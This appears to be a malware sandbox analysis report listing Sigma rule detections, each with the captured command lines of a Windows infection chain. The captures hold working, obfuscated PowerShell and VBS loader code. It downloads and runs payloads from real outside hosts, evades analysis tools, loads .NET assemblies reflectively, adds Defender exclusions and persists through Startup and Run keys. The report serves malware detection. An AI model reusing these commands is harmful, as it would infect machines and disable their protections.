'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6936, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, ProcessId: 2332, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2300, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 6864, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6936, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, ProcessId: 2332, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6936, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, ProcessId: 2332, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6936, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, ProcessId: 2332, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7192, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_bsa

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6936, TargetFilename: C:\Users\user\AppData\Local\Temp\x.vbs

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://

Sigma detected: PowerShell Script Run in AppData

Source: Process started

